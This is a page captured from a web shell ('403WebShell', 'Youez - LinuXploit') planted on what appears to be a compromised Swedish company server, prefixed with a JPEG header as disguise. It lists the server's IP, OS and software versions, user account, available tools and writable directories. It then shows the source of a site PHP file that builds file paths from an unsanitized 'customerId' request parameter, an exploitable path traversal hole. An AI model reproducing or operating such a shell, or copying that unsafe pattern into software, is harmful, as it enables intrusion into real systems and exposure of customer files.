????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 18.191.73.161
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/icad.astacus.se/productionzon/JavaPowUpload/lib/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/icad.astacus.se/productionzon/JavaPowUpload/lib/GenerateXMLShared.php
<?php
$html = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<download>";
$CustomerId = $_GET['customerId'];
$url_prefix="http://icad.astacus.se/customerzon/downloadshared.php?customerId=$CustomerId&amp;file=";
function ListFolder($path)
{
	global $CustomerId;
	$source_encoding = "ISO-8859-1";
	
	
	global $html;
	global $url_prefix;
    //using the opendir function
    $dir_handle = @opendir($path);
   
    //Leave only the lastest folder name
    $dirname = end(explode("/", $path));
     $dirname = iconv($source_encoding,"UTF-8",$dirname);
    //display the target folder.
	
	if($dirname != ""){
    	$html.= "<folder name=\"$dirname\">\n";
    }
    while (false !== ($file = readdir($dir_handle)))
    {
	    
  $download_url = iconv($source_encoding,"UTF-8",($path).("/").($file));
		$download_url=rawurlencode($download_url);
		$download_url = substr($download_url,strlen("%2Fvar%2Fwww%2Ficad_files%2F$CustomerId%2Fshared%2F%2F"),200);
		
        if($file!="." && $file!="..")
        {
            if (is_dir($path."/".$file))
            {
                //Display a list of sub folders.
                ListFolder($path."/".$file);
            }
            else
            {
                //Display a list of files.
				$p1 = "/var/www/icad_files/$CustomerId/shared//";
				
   
                $html.=  "<file name=\"".(iconv($source_encoding,"UTF-8",$file))."\" length=\"".filesize($path."/".($file))."\"><url>$url_prefix".($download_url)."</url></file>";
            
			}
        }
    }
	if($dirname != ""){
    $html.=  "</folder>\n";
  	}	
	

    //closing the directory
    closedir($dir_handle);
}
		
		
		
		if(file_exists("/var/www/icad_files/$CustomerId/shared/")){
		
		ListFolder("/var/www/icad_files/$CustomerId/shared/");
		}
		
		
		
header('Content-Type: text/xml; charset=UTF-8\r\n');
echo($html."</download>");?>

Youez - 2016 - github.com/yon3zu
LinuXploit